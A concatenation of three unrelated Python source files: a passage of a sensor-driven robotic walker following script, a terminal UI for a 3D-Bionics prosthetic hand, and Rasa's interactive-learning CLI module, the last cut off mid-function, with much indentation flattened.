# IMU_walker_portal = '/dev/ttyUSB0'
IMU_human_portal = '/dev/ttyUSB1'
# IMU_left_leg_portal = '/dev/ttyUSB6'
# IMU_right_leg_portal = '/dev/ttyUSB3'
# IMU_human_portal = '/dev/ttyUSB5'
# IMU_left_leg_portal = '/dev/ttyUSB6'
# IMU_right_leg_portal = '/dev/ttyUSB7'
Camera = IRCamera.IRCamera()
LD = Leg_detector.Leg_detector(lidar_portal)
CD = cd.ControlDriver(record_mode=True, left_right=0)
win_width = 10
FrontFollowingModel = FFL.FrontFollowing_Model(win_width=win_width)
weight_path = "./checkpoints_combine/Combine"
FrontFollowingModel.combine_net.load_weights(weight_path)
# IMU_walker = IMU.IMU(name="walker")
# IMU_walker.open_serial(IMU_walker_portal)
# IMU_right_leg = IMU.IMU(name="right_leg")
# IMU_right_leg.open_serial(IMU_right_leg_portal)
# IMU_left_leg = IMU.IMU(name="left_leg")
# IMU_left_leg.open_serial(IMU_left_leg_portal)
IMU_human = IMU.IMU(name="human")
IMU_human.open_serial(IMU_human_portal)
# IMU_human = IMU.IMU(name="human")
# IMU_human.open_serial(IMU_human_portal)
"""recording output"""
file_path = os.path.abspath(data_path+os.path.sep+"output.txt")
def position_calculation(left_leg: np.ndarray, right_leg: np.ndarray,
                         position_buffer: np.ndarray, weight_array: np.ndarray):
    """Average the left-leg, right-leg and human positions over a short buffer.
    weight_array is a 1 x buffer_length matrix of averaging weights
    (a plain mean over the buffer is currently used instead)."""
human_position = (left_leg + right_leg) / 2
new_buffer = np.copy(position_buffer)
new_buffer[0:new_buffer.shape[0] - 1, :] = position_buffer[1:position_buffer.shape[0], :]
new_buffer[-1, 0] = left_leg[0]
new_buffer[-1, 1] = left_leg[1]
new_buffer[-1, 2] = right_leg[0]
new_buffer[-1, 3] = right_leg[1]
new_buffer[-1, 4] = human_position[0]
new_buffer[-1, 5] = human_position[1]
# current_position = np.matmul(weight_array, new_buffer)[0]
current_position = np.mean(new_buffer, axis=0)
return current_position, new_buffer
def main_FFL(CD: cd.ControlDriver, LD: Leg_detector.Leg_detector, IR: IRCamera.IRCamera, FFL_Model:FFL.FrontFollowing_Model, file_path, IMU:IMU.IMU):
# weight buffer for lidar detection
position_buffer_length = 3
position_buffer = np.zeros((position_buffer_length, 6))
weight_array = np.array((range(1, position_buffer_length + 1))).reshape((1, 3))
weight_array = weight_array / weight_array.sum()
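    # note: weight_array is passed to position_calculation, which currently takes a plain mean over the buffer instead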
CD.speed = 0
CD.omega = 0
CD.radius = 0
# walker rear wheel distance = 56
# data buffer for neural network
max_ir = 40
min_ir = 10
ir_data_width = 768
additional_data_width = 4
buffer_length = win_width
buffer = np.zeros((buffer_length * (ir_data_width + additional_data_width), 1))
file_record = open(file_path,'w')
while True:
IR.get_irdata_once()
if len(IR.temperature) == 768:
# update buffer and predict
normalized_temperature = np.array(IR.temperature).reshape((ir_data_width, 1))
normalized_temperature = (normalized_temperature - min_ir) / (max_ir - min_ir)
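            # slide the IR frame window one step: drop the oldest frame and append the newest normalized frame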
buffer[0:(buffer_length - 1) * ir_data_width, 0] = buffer[ir_data_width:buffer_length * ir_data_width, 0]
buffer[(buffer_length - 1) * ir_data_width:buffer_length * ir_data_width] = normalized_temperature
"""additional part start index"""
PART2 = buffer_length * ir_data_width
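            # lidar leg coordinates are appended as extra features; the /40 + 0.4 scaling is assumed to match the normalization used during training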
additional_data = [LD.left_leg[0], LD.left_leg[1], LD.right_leg[0], LD.right_leg[1]]
additional_data = np.array(additional_data) / 40 + 0.4
additional_data = np.reshape(additional_data, (additional_data.shape[0], 1))
buffer[PART2:PART2 + (buffer_length - 1) * additional_data_width, 0] = \
buffer[PART2 + additional_data_width:PART2 + buffer_length * additional_data_width, 0]
buffer[PART2 + (buffer_length - 1) * additional_data_width:PART2 + buffer_length * additional_data_width] = \
additional_data
buffer[PART2:PART2 + buffer_length * additional_data_width, 0] = buffer[
PART2:PART2 + buffer_length * additional_data_width,
0]
predict_buffer = buffer.reshape((-1, buffer_length * (ir_data_width + additional_data_width), 1))
result = FFL_Model.combine_net.predict(predict_buffer)
max_possibility = result.max()
action_label = np.unravel_index(np.argmax(result), result.shape)[1]
current_left_leg = LD.left_leg
current_right_leg = LD.right_leg
current_position, position_buffer = position_calculation(current_left_leg, current_right_leg,
position_buffer, weight_array)
max_boundary=14.5 #left max value
min_boundary=-14 #right max value
forward_boundry = 8
backward_boundry = -5
center_left_boundry = 1 #change gwz
center_right_boundry = 0.3
left_boundry = 8.5 #change gwz
right_boundry = -7
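            # hand-tuned boundaries on the averaged human position select between backward, turning, forward and stop below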
if backward_boundry > current_position[4] > -40:
CD.speed = -0.1
CD.omega = 0
CD.radius = 0
str1 = "backward"
elif current_position[4] > forward_boundry:
if current_position[5] > center_left_boundry \
and current_position[0] > current_position[2] \
and current_position[1] > left_boundry :
# and action_label==2 :
CD.speed = 0
radius = 30+abs(50*(max_boundary-current_position[1])/(max_boundary-left_boundry))
if radius < 50 :
radius = 50
CD.radius = radius
CD.omega = 10/CD.radius
str1 = "left"
time.sleep(0.1)
elif current_position[5] < center_right_boundry \
and current_position[2] > current_position[0] \
and current_position[3] < right_boundry :
# and action_label== 3 :
CD.speed = 0
radius = 30+abs(50*(current_position[3]-min_boundary)/(right_boundry-min_boundary))
if radius < 50 :
radius = 50
CD.radius = radius
CD.omega = -10/CD.radius
str1 = "right"
time.sleep(0.1)
else:
CD.speed = 0.1
CD.omega = 0
CD.radius = 0
str1 = "forward"
elif action_label== 4 :
CD.speed = 0
radius = abs(20*(center_left_boundry-current_position[1])/(max_boundary-center_left_boundry))
if radius < 10:
radius = 10
CD.radius = 0
CD.omega = 0.2
str1 = "left in space"
time.sleep(0.1)
elif action_label== 5:
CD.speed = 0
radius = abs(20*(current_position[3]-min_boundary)/(center_left_boundry-min_boundary))
if radius < 10 :
radius = 10
CD.radius = 0
CD.omega = -0.2
str1 = "right in space"
time.sleep(0.1)
else:
CD.speed=0
CD.omega=0
CD.radius = 0
str1 = "stop"
print("\rleft leg:%.2f,%.2f right:%.2f,%.2f human:%.2f,%.2f choice:%s,%.2f,%.2f,%.2f "
%(current_position[0], current_position[1], current_position[2],
current_position[3], current_position[4], current_position[5],str1,CD.speed,CD.omega,CD.radius),end="")
# record.append(str1)
record = [action_label] + current_position.tolist() + list(IMU.a) + list(IMU.w) + list(IMU.Angle)
file_record.write(str1+" "+str(record)+"\n")
file_record.flush()
thread_leg = threading.Thread(target=LD.scan_procedure, args=(False,True,))
thread_cd = threading.Thread(target=CD.control_part, args=())
thread_main = threading.Thread(target=main_FFL, args=(CD, LD, Camera, FrontFollowingModel,file_path,IMU_human))
# thread_IMU_walker = threading.Thread(target=IMU_walker.read_record,args=())
thread_IMU_human = threading.Thread(target=IMU_human.read_record,args=())
# thread_IMU_left = threading.Thread(target=IMU_left_leg.read_record,args=())
# thread_IMU_right = threading.Thread(target=IMU_right_leg.read_record,args=())
thread_leg.start()
time.sleep(3)
thread_cd.start()
thread_main.start()
# thread_IMU_human.start()
# thread_IMU_walker.start()
thread_IMU_human.start()
# thread_IMU_walker.start()
# thread_IMU_left.start()
# thread_IMU_right.start()
|
terminal-ui.py
|
import npyscreen
import curses.ascii
from curses import endwin
from hand_object import hand
from communication_framework import Comframe, getOpenPorts
from ui_widgets import TSlider, TimeSlider, BoxSelectOne, BoxOptions, PortBox
class MainForm(npyscreen.FormBaseNew):
DEFAULT_LINES = 26
def create(self):
# Init Form and Objects
if(self.parentApp.demomode is True):
self.name = "3D-Bionics Hand Control Software DEMO"
else:
self.name = "3D-Bionics Hand Control Software"
self.comframe = self.parentApp.comframe
self.hand = self.parentApp.hand
y, x = self.useable_space()
left = round(x*2/3)
# Create UI
self.nextrely = 3
self.klein = self.add(TSlider, max_width=left,name = "Klein")
self.nextrely +=1
self.ring = self.add(TSlider, max_width=left, name = "Ring")
self.nextrely +=1
self.mittel = self.add(TSlider, max_width=left, name = "Mittel")
self.nextrely +=1
self.zeige = self.add(TSlider, max_width=left, name = "Zeige")
self.nextrely +=1
self.daumen = self.add(TSlider, max_width=left, name = "Daumen")
self.nextrely += 3
self.timeslider = self.add(TimeSlider, max_width=round(left/1.5), value=0.3, name = "Delay", hidden = True)
self.nextrely = y-3
self.ports = self.add(PortBox,max_width=left)
self.nextrelx = left + 10
self.nextrely = 2
self.quickPos = self.add(BoxSelectOne, max_height= round((y-2)/2), name = "Quick Positions")
self.nextrely += 1
self.reloadPos = self.add(npyscreen.ButtonPress, name="Nochmal!", relx=self.nextrelx+15, when_pressed_function = lambda : self.quickPos.entry_widget.setPosition() )
self.nextrely += 1
self.options = self.add(BoxOptions)
# init handlers
handlers = {
'^Q': self.exit_func,
curses.ascii.ESC: self.exit_func
}
self.add_handlers(handlers)
# Additional Config
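        # keypress_timeout makes npyscreen call while_waiting() periodically, so updatePos() keeps the sliders in sync with the hand state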
self.keypress_timeout=1
def afterEditing(self):
self.parentApp.setNextForm(None)
def while_waiting(self):
self.updatePos()
def sendPos(self):
new_pos = [[
int(self.klein.value),
int(self.ring.value),
int(self.mittel.value),
int(self.zeige.value),
int(self.daumen.value)
]]
self.comframe.queue_clear()
self.comframe.queue_position(new_pos)
def reloadQuickPos(self):
self.quickPos.entry_widget.setPosition()
def updatePos(self):
self.klein.set_value(self.hand.getKlein())
self.mittel.set_value(self.hand.getMittel())
self.ring.set_value(self.hand.getRing())
self.zeige.set_value(self.hand.getZeige())
self.daumen.set_value(self.hand.getDaumen())
self.display()
# Various functions
def exit_func(self, _input):
self.editing = False
class hand_controll(npyscreen.NPSAppManaged):
def __init__(self, comframe: Comframe,hand: hand,demomode = None):
self.comframe = comframe
self.hand = hand
self.demomode = demomode
super(hand_controll,self).__init__()
def onStart(self):
self.addForm("MAIN", MainForm)
if __name__ == "__main__":
import argparse
from demo import Demo
import threading
    # Define parser for arguments from the command line
def CLIParser():
        parser = argparse.ArgumentParser(description="The 3D-Bionics Hand Control software.")
parser.add_argument('-v','--version', action='version',version='%(prog)s 1.0')
parser.add_argument('-p','--port', help="Specify the serial-port of the 3D-Bionics Hand" )
parser.add_argument('--getAvailablePorts', help="Displays a list of all available ports", action='version',version= "\n".join(getOpenPorts()))
        parser.add_argument('-d','--demo', help="For demonstration purposes. Plays a sequence of animations defined in demo.py", action="store_true")
return parser.parse_args()
args = CLIParser()
    # Initialize hand object and communication framework
hand_object = hand()
try:
comframe = Comframe(hand_object, args.port)
except:
if args.port:
            print("Connection Error: Could not open connection on the specified port")
else:
print("Connection Error: No valid serial port detected!")
            print("Make sure the Arduino is connected and that the application has access rights to the serial port")
quit()
# Start thread with demo-script. See demo.py to see how it works
if args.demo:
threading.Thread(target=Demo,args=(comframe,), daemon=True).start()
# Start App
App = hand_controll(comframe,hand_object,args.demo)
App.run()
|
interactive.py
|
import asyncio
import logging
import os
import tempfile
import textwrap
import uuid
from functools import partial
from multiprocessing import Process
from typing import Any, Callable, Dict, List, Optional, Text, Tuple, Union, Set
import numpy as np
from aiohttp import ClientError
from colorclass import Color
from rasa.nlu.training_data.loading import MARKDOWN, RASA
from sanic import Sanic, response
from sanic.exceptions import NotFound
from terminaltables import AsciiTable, SingleTable
import questionary
import rasa.cli.utils
from questionary import Choice, Form, Question
from rasa.cli import utils as cliutils
from rasa.core import constants, run, train, utils
from rasa.core.actions.action import ACTION_LISTEN_NAME, default_action_names
from rasa.core.channels.channel import UserMessage
from rasa.core.constants import (
DEFAULT_SERVER_FORMAT,
DEFAULT_SERVER_PORT,
DEFAULT_SERVER_URL,
REQUESTED_SLOT,
UTTER_PREFIX,
)
from rasa.core.domain import Domain
import rasa.core.events
from rasa.core.events import (
ActionExecuted,
ActionReverted,
BotUttered,
Event,
Restarted,
UserUttered,
UserUtteranceReverted,
)
from rasa.core.interpreter import INTENT_MESSAGE_PREFIX, NaturalLanguageInterpreter
from rasa.core.trackers import EventVerbosity, DialogueStateTracker
from rasa.core.training import visualization
from rasa.core.training.visualization import (
VISUALIZATION_TEMPLATE_PATH,
visualize_neighborhood,
)
from rasa.core.utils import AvailableEndpoints
from rasa.utils.common import update_sanic_log_level
from rasa.utils.endpoints import EndpointConfig
# noinspection PyProtectedMember
from rasa.nlu.training_data import loading
from rasa.nlu.training_data.message import Message
# WARNING: This command line UI is using an external library
# communicating with the shell - these functions are hard to test
# automatically. If you change anything in here, please make sure to
# run the interactive learning and check if your part of the "ui"
# still works.
import rasa.utils.io as io_utils
logger = logging.getLogger(__name__)
MAX_VISUAL_HISTORY = 3
PATHS = {
"stories": "data/stories.md",
"nlu": "data/nlu.md",
"backup": "data/nlu_interactive.md",
"domain": "domain.yml",
}
SAVE_IN_E2E = False
# choose other intent, making sure this doesn't clash with an existing intent
OTHER_INTENT = uuid.uuid4().hex
OTHER_ACTION = uuid.uuid4().hex
NEW_ACTION = uuid.uuid4().hex
NEW_TEMPLATES = {}
MAX_NUMBER_OF_TRAINING_STORIES_FOR_VISUALIZATION = 200
DEFAULT_STORY_GRAPH_FILE = "story_graph.dot"
class RestartConversation(Exception):
"""Exception used to break out the flow and restart the conversation."""
pass
class ForkTracker(Exception):
"""Exception used to break out the flow and fork at a previous step.
The tracker will be reset to the selected point in the past and the
conversation will continue from there."""
pass
class UndoLastStep(Exception):
"""Exception used to break out the flow and undo the last step.
The last step is either the most recent user message or the most
recent action run by the bot."""
pass
class Abort(Exception):
"""Exception used to abort the interactive learning and exit."""
pass
async def send_message(
endpoint: EndpointConfig,
sender_id: Text,
message: Text,
parse_data: Optional[Dict[Text, Any]] = None,
) -> Dict[Text, Any]:
"""Send a user message to a conversation."""
payload = {
"sender": UserUttered.type_name,
"text": message,
"parse_data": parse_data,
}
return await endpoint.request(
json=payload, method="post", subpath=f"/conversations/{sender_id}/messages"
)
async def request_prediction(
endpoint: EndpointConfig, sender_id: Text
) -> Dict[Text, Any]:
"""Request the next action prediction from core."""
return await endpoint.request(
method="post", subpath=f"/conversations/{sender_id}/predict"
)
async def retrieve_domain(endpoint: EndpointConfig) -> Dict[Text, Any]:
"""Retrieve the domain from core."""
return await endpoint.request(
method="get", subpath="/domain", headers={"Accept": "application/json"}
)
async def retrieve_status(endpoint: EndpointConfig) -> Dict[Text, Any]:
"""Retrieve the status from core."""
return await endpoint.request(method="get", subpath="/status")
async def retrieve_tracker(
endpoint: EndpointConfig,
sender_id: Text,
verbosity: EventVerbosity = EventVerbosity.ALL,
) -> Dict[Text, Any]:
"""Retrieve a tracker from core."""
path = "/conversations/{}/tracker?include_events={}".format(
sender_id, verbosity.name
)
return await endpoint.request(
method="get", subpath=path, headers={"Accept": "application/json"}
)
async def send_action(
endpoint: EndpointConfig,
sender_id: Text,
action_name: Text,
policy: Optional[Text] = None,
confidence: Optional[float] = None,
is_new_action: bool = False,
) -> Dict[Text, Any]:
"""Log an action to a conversation."""
payload = ActionExecuted(action_name, policy, confidence).as_dict()
subpath = f"/conversations/{sender_id}/execute"
try:
return await endpoint.request(json=payload, method="post", subpath=subpath)
except ClientError:
if is_new_action:
if action_name in NEW_TEMPLATES:
warning_questions = questionary.confirm(
"WARNING: You have created a new action: '{}', "
"with matching template: '{}'. "
"This action will not return its message in this session, "
"but the new utterance will be saved to your domain file "
"when you exit and save this session. "
"You do not need to do anything further. "
"".format(action_name, [*NEW_TEMPLATES[action_name]][0])
)
await _ask_questions(warning_questions, sender_id, endpoint)
else:
warning_questions = questionary.confirm(
"WARNING: You have created a new action: '{}', "
"which was not successfully executed. "
"If this action does not return any events, "
"you do not need to do anything. "
"If this is a custom action which returns events, "
"you are recommended to implement this action "
"in your action server and try again."
"".format(action_name)
)
await _ask_questions(warning_questions, sender_id, endpoint)
payload = ActionExecuted(action_name).as_dict()
return await send_event(endpoint, sender_id, payload)
else:
logger.error("failed to execute action!")
raise
async def send_event(
endpoint: EndpointConfig,
sender_id: Text,
evt: Union[List[Dict[Text, Any]], Dict[Text, Any]],
) -> Dict[Text, Any]:
"""Log an event to a conversation."""
subpath = f"/conversations/{sender_id}/tracker/events"
return await endpoint.request(json=evt, method="post", subpath=subpath)
def format_bot_output(message: BotUttered) -> Text:
"""Format a bot response to be displayed in the history table."""
# First, add text to output
output = message.text or ""
# Then, append all additional items
data = message.data or {}
if not data:
return output
if data.get("image"):
output += "\nImage: " + data.get("image")
if data.get("attachment"):
output += "\nAttachment: " + data.get("attachment")
if data.get("buttons"):
output += "\nButtons:"
choices = cliutils.button_choices_from_message_data(
data, allow_free_text_input=True
)
for choice in choices:
output += "\n" + choice
if data.get("elements"):
output += "\nElements:"
for idx, element in enumerate(data.get("elements")):
element_str = cliutils.element_to_string(element, idx)
output += "\n" + element_str
if data.get("quick_replies"):
output += "\nQuick replies:"
for idx, element in enumerate(data.get("quick_replies")):
element_str = cliutils.element_to_string(element, idx)
output += "\n" + element_str
return output
def latest_user_message(events: List[Dict[Text, Any]]) -> Optional[Dict[Text, Any]]:
"""Return most recent user message."""
for i, e in enumerate(reversed(events)):
if e.get("event") == UserUttered.type_name:
return e
return None
def all_events_before_latest_user_msg(
events: List[Dict[Text, Any]]
) -> List[Dict[Text, Any]]:
"""Return all events that happened before the most recent user message."""
for i, e in enumerate(reversed(events)):
if e.get("event") == UserUttered.type_name:
return events[: -(i + 1)]
return events
async def _ask_questions(
questions: Union[Form, Question],
sender_id: Text,
endpoint: EndpointConfig,
is_abort: Callable[[Dict[Text, Any]], bool] = lambda x: False,
) -> Any:
"""Ask the user a question, if Ctrl-C is pressed provide user with menu."""
should_retry = True
answers = {}
while should_retry:
answers = questions.ask()
if answers is None or is_abort(answers):
should_retry = await _ask_if_quit(sender_id, endpoint)
else:
should_retry = False
return answers
def _selection_choices_from_intent_prediction(
predictions: List[Dict[Text, Any]]
) -> List[Dict[Text, Any]]:
    """Given a list of ML predictions, create a UI choice list."""
sorted_intents = sorted(predictions, key=lambda k: (-k["confidence"], k["name"]))
choices = []
for p in sorted_intents:
name_with_confidence = "{:03.2f} {:40}".format(
p.get("confidence"), p.get("name")
)
choice = {"name": name_with_confidence, "value": p.get("name")}
choices.append(choice)
return choices
async def _request_free_text_intent(sender_id: Text, endpoint: EndpointConfig) -> Text:
question = questionary.text(
message="Please type the intent name:",
validate=io_utils.not_empty_validator("Please enter an intent name"),
)
return await _ask_questions(question, sender_id, endpoint)
async def _request_free_text_action(sender_id: Text, endpoint: EndpointConfig) -> Text:
question = questionary.text(
message="Please type the action name:",
validate=io_utils.not_empty_validator("Please enter an action name"),
)
return await _ask_questions(question, sender_id, endpoint)
async def _request_free_text_utterance(
sender_id: Text, endpoint: EndpointConfig, action: Text
) -> Text:
question = questionary.text(
message=(
"Please type the message for your new utterance "
"template '{}':".format(action)
),
validate=io_utils.not_empty_validator("Please enter a template message"),
)
return await _ask_questions(question, sender_id, endpoint)
async def _request_selection_from_intents(
intents: List[Dict[Text, Text]], sender_id: Text, endpoint: EndpointConfig
) -> Text:
question = questionary.select("What intent is it?", choices=intents)
return await _ask_questions(question, sender_id, endpoint)
async def _request_fork_point_from_list(
forks: List[Dict[Text, Text]], sender_id: Text, endpoint: EndpointConfig
) -> Text:
question = questionary.select(
"Before which user message do you want to fork?", choices=forks
)
return await _ask_questions(question, sender_id, endpoint)
async def _request_fork_from_user(
sender_id, endpoint
) -> Optional[List[Dict[Text, Any]]]:
"""Take in a conversation and ask at which point to fork the conversation.
Returns the list of events that should be kept. Forking means, the
conversation will be reset and continued from this previous point."""
tracker = await retrieve_tracker(endpoint, sender_id, EventVerbosity.AFTER_RESTART)
choices = []
for i, e in enumerate(tracker.get("events", [])):
if e.get("event") == UserUttered.type_name:
choices.append({"name": e.get("text"), "value": i})
fork_idx = await _request_fork_point_from_list(
list(reversed(choices)), sender_id, endpoint
)
if fork_idx is not None:
return tracker.get("events", [])[: int(fork_idx)]
else:
return None
async def _request_intent_from_user(
latest_message, intents, sender_id, endpoint
) -> Dict[Text, Any]:
"""Take in latest message and ask which intent it should have been.
Returns the intent dict that has been selected by the user."""
predictions = latest_message.get("parse_data", {}).get("intent_ranking", [])
predicted_intents = {p["name"] for p in predictions}
for i in intents:
if i not in predicted_intents:
predictions.append({"name": i, "confidence": 0.0})
# convert intents to ui list and add <other> as a free text alternative
choices = [
{"name": "<create_new_intent>", "value": OTHER_INTENT}
] + _selection_choices_from_intent_prediction(predictions)
intent_name = await _request_selection_from_intents(choices, sender_id, endpoint)
if intent_name == OTHER_INTENT:
intent_name = await _request_free_text_intent(sender_id, endpoint)
selected_intent = {"name": intent_name, "confidence": 1.0}
else:
# returns the selected intent with the original probability value
selected_intent = next(
(x for x in predictions if x["name"] == intent_name), {"name": None}
)
return selected_intent
async def _print_history(sender_id: Text, endpoint: EndpointConfig) -> None:
"""Print information about the conversation for the user."""
tracker_dump = await retrieve_tracker(
endpoint, sender_id, EventVerbosity.AFTER_RESTART
)
events = tracker_dump.get("events", [])
table = _chat_history_table(events)
slot_strs = _slot_history(tracker_dump)
print("------")
print("Chat History\n")
print(table)
if slot_strs:
print("\n")
print("Current slots: \n\t{}\n".format(", ".join(slot_strs)))
print("------")
def _chat_history_table(events: List[Dict[Text, Any]]) -> Text:
"""Create a table containing bot and user messages.
Also includes additional information, like any events and
prediction probabilities."""
def wrap(txt: Text, max_width: int) -> Text:
return "\n".join(textwrap.wrap(txt, max_width, replace_whitespace=False))
def colored(txt: Text, color: Text) -> Text:
return "{" + color + "}" + txt + "{/" + color + "}"
def format_user_msg(user_event: UserUttered, max_width: int) -> Text:
intent = user_event.intent or {}
intent_name = intent.get("name", "")
_confidence = intent.get("confidence", 1.0)
_md = _as_md_message(user_event.parse_data)
_lines = [
colored(wrap(_md, max_width), "hired"),
f"intent: {intent_name} {_confidence:03.2f}",
]
return "\n".join(_lines)
def bot_width(_table: AsciiTable) -> int:
return _table.column_max_width(1)
def user_width(_table: AsciiTable) -> int:
return _table.column_max_width(3)
def add_bot_cell(data, cell):
data.append([len(data), Color(cell), "", ""])
def add_user_cell(data, cell):
data.append([len(data), "", "", Color(cell)])
# prints the historical interactions between the bot and the user,
# to help with correctly identifying the action
table_data = [
[
"# ",
Color(colored("Bot ", "autoblue")),
" ",
Color(colored("You ", "hired")),
]
]
table = SingleTable(table_data, "Chat History")
bot_column = []
tracker = DialogueStateTracker.from_dict("any", events)
applied_events = tracker.applied_events()
for idx, event in enumerate(applied_events):
if isinstance(event, ActionExecuted):
bot_column.append(colored(event.action_name, "autocyan"))
if event.confidence is not None:
bot_column[-1] += colored(f" {event.confidence:03.2f}", "autowhite")
elif isinstance(event, UserUttered):
if bot_column:
text = "\n".join(bot_column)
add_bot_cell(table_data, text)
bot_column = []
msg = format_user_msg(event, user_width(table))
add_user_cell(table_data, msg)
elif isinstance(event, BotUttered):
wrapped = wrap(format_bot_output(event), bot_width(table))
bot_column.append(colored(wrapped, "autoblue"))
else:
if event.as_story_string():
bot_column.append(wrap(event.as_story_string(), bot_width(table)))
if bot_column:
text = "\n".join(bot_column)
add_bot_cell(table_data, text)
table.inner_heading_row_border = False
table.inner_row_border = True
table.inner_column_border = False
table.outer_border = False
table.justify_columns = {0: "left", 1: "left", 2: "center", 3: "right"}
return table.table
def _slot_history(tracker_dump: Dict[Text, Any]) -> List[Text]:
"""Create an array of slot representations to be displayed."""
slot_strs = []
for k, s in tracker_dump.get("slots", {}).items():
colored_value = cliutils.wrap_with_color(
str(s), color=rasa.cli.utils.bcolors.WARNING
)
slot_strs.append(f"{k}: {colored_value}")
return slot_strs
async def _write_data_to_file(sender_id: Text, endpoint: EndpointConfig):
"""Write stories and nlu data to file."""
story_path, nlu_path, domain_path = _request_export_info()
tracker = await retrieve_tracker(endpoint, sender_id)
events = tracker.get("events", [])
serialised_domain = await retrieve_domain(endpoint)
domain = Domain.from_dict(serialised_domain)
await _write_stories_to_file(story_path, events, domain)
await _write_nlu_to_file(nlu_path, events)
await _write_domain_to_file(domain_path, events, domain)
logger.info("Successfully wrote stories and NLU data")
async def _ask_if_quit(sender_id: Text, endpoint: EndpointConfig) -> bool:
"""Display the exit menu.
Return `True` if the previous question should be retried."""
answer = questionary.select(
message="Do you want to stop?",
choices=[
Choice("Continue", "continue"),
Choice("Undo Last", "undo"),
Choice("Fork", "fork"),
Choice("Start Fresh", "restart"),
Choice("Export & Quit", "quit"),
],
).ask()
if not answer or answer == "quit":
# this is also the default answer if the user presses Ctrl-C
await _write_data_to_file(sender_id, endpoint)
raise Abort()
elif answer == "continue":
# in this case we will just return, and the original
# question will get asked again
return True
elif answer == "undo":
raise UndoLastStep()
elif answer == "fork":
raise ForkTracker()
elif answer == "restart":
raise RestartConversation()
async def _request_action_from_user(
predictions: List[Dict[Text, Any]], sender_id: Text, endpoint: EndpointConfig
) -> Tuple[Text, bool]:
"""Ask the user to correct an action prediction."""
await _print_history(sender_id, endpoint)
choices = [
{
"name": "{:03.2f} {:40}".format(a.get("score"), a.get("action")),
"value": a.get("action"),
}
for a in predictions
]
tracker = await retrieve_tracker(endpoint, sender_id)
events = tracker.get("events", [])
session_actions_all = [a["name"] for a in _collect_actions(events)]
session_actions_unique = list(set(session_actions_all))
old_actions = [action["value"] for action in choices]
new_actions = [
{"name": action, "value": OTHER_ACTION + action}
for action in session_actions_unique
if action not in old_actions
]
choices = (
[{"name": "<create new action>", "value": NEW_ACTION}] + new_actions + choices
)
question = questionary.select("What is the next action of the bot?", choices)
action_name = await _ask_questions(question, sender_id, endpoint)
is_new_action = action_name == NEW_ACTION
if is_new_action:
# create new action
action_name = await _request_free_text_action(sender_id, endpoint)
if action_name.startswith(UTTER_PREFIX):
utter_message = await _request_free_text_utterance(
sender_id, endpoint, action_name
)
NEW_TEMPLATES[action_name] = {utter_message: ""}
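    # OTHER_ACTION is a 32-character uuid4 hex sentinel prefixed onto actions created earlier in this session; strip it to recover the real name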
elif action_name[:32] == OTHER_ACTION:
# action was newly created in the session, but not this turn
is_new_action = True
action_name = action_name[32:]
print(f"Thanks! The bot will now run {action_name}.\n")
return action_name, is_new_action
def _request_export_info() -> Tuple[Text, Text, Text]:
"""Request file path and export stories & nlu data to that path"""
# export training data and quit
questions = questionary.form(
export_stories=questionary.text(
message="Export stories to (if file exists, this "
"will append the stories)",
default=PATHS["stories"],
validate=io_utils.file_type_validator(
[".md"],
"Please provide a valid export path for the stories, e.g. 'stories.md'.",
),
),
export_nlu=questionary.text(
message="Export NLU data to (if file exists, this will "
"merge learned data with previous training examples)",
default=PATHS["nlu"],
validate=io_utils.file_type_validator(
[".md", ".json"],
"Please provide a valid export path for the NLU data, e.g. 'nlu.md'.",
),
),
export_domain=questionary.text(
message="Export domain file to (if file exists, this "
"will be overwritten)",
default=PATHS["domain"],
validate=io_utils.file_type_validator(
[".yml", ".yaml"],
"Please provide a valid export path for the domain file, e.g. 'domain.yml'.",
),
),
)
answers = questions.ask()
if not answers:
raise Abort()
return (answers["export_stories"], answers["export_nlu"], answers["export_domain"])
def _split_conversation_at_restarts(
events: List[Dict[Text, Any]]
) -> List[List[Dict[Text, Any]]]:
"""Split a conversation at restart events.
Returns an array of event lists, without the restart events."""
sub_conversations = []
current = []
for e in events:
if e.get("event") == "restart":
if current:
sub_conversations.append(current)
current = []
else:
current.append(e)
if current:
sub_conversations.append(current)
return sub_conversations
def _collect_messages(events: List[Dict[Text, Any]]) -> List[Message]:
"""Collect the message text and parsed data from the UserMessage events
into a list"""
from rasa.nlu.extractors.duckling_http_extractor import DucklingHTTPExtractor
from rasa.nlu.extractors.mitie_entity_extractor import MitieEntityExtractor
from rasa.nlu.extractors.spacy_entity_extractor import SpacyEntityExtractor
msgs = []
for event in events:
if event.get("event") == UserUttered.type_name:
data = event.get("parse_data", {})
for entity in data.get("entities", []):
excluded_extractors = [
DucklingHTTPExtractor.__name__,
SpacyEntityExtractor.__name__,
MitieEntityExtractor.__name__,
]
logger.debug(
"Exclude entity marking of following extractors"
" {} when writing nlu data "
"to file.".format(excluded_extractors)
)
if entity.get("extractor") in excluded_extractors:
data["entities"].remove(entity)
msg = Message.build(data["text"], data["intent"]["name"], data["entities"])
msgs.append(msg)
elif event.get("event") == UserUtteranceReverted.type_name and msgs:
msgs.pop() # user corrected the nlu, remove incorrect example
return msgs
def _collect_actions(events: List[Dict[Text, Any]]) -> List[Dict[Text, Any]]:
"""Collect all the `ActionExecuted` events into a list."""
return [evt for evt in events if evt.get("event") == ActionExecuted.type_name]
async def _write_stories_to_file(
export_story_path: Text, events: List[Dict[Text, Any]], domain: Domain
) -> None:
"""Write the conversation of the sender_id to the file paths."""
sub_conversations = _split_conversation_at_restarts(events)
io_utils.create_path(export_story_path)
if os.path.exists(export_story_path):
append_write = "a" # append if already exists
else:
append_write = "w" # make a new file if not
with open(export_story_path, append_write, encoding=io_utils.DEFAULT_ENCODING) as f:
i = 1
for conversation in sub_conversations:
parsed_events = rasa.core.events.deserialise_events(conversation)
tracker = DialogueStateTracker.from_events(
f"interactive_story_{i}", evts=parsed_events, slots=domain.slots
)
if any(
isinstance(event, UserUttered) for event in tracker.applied_events()
):
i += 1
f.write("\n" + tracker.export_stories(SAVE_IN_E2E))
def _filter_messages(msgs: List[Message]) -> List[Message]:
"""Filter messages removing those that start with INTENT_MESSAGE_PREFIX"""
filtered_messages = []
for msg in msgs:
if not msg.text.startswith(INTENT_MESSAGE_PREFIX):
filtered_messages.append(msg)
return filtered_messages
async def _write_nlu_to_file(
export_nlu_path: Text, events: List[Dict[Text, Any]]
) -> None:
"""Write the nlu data of the sender_id to the file paths."""
from rasa.nlu.training_data import TrainingData
msgs = _collect_messages(events)
msgs = _filter_messages(msgs)
# noinspection PyBroadException
try:
previous_examples = loading.load_data(export_nlu_path)
except Exception as e:
logger.debug(
"An exception occurred while trying to load the NLU data. {}".format(str(e))
)
# No previous file exists, use empty training data as replacement.
previous_examples = TrainingData()
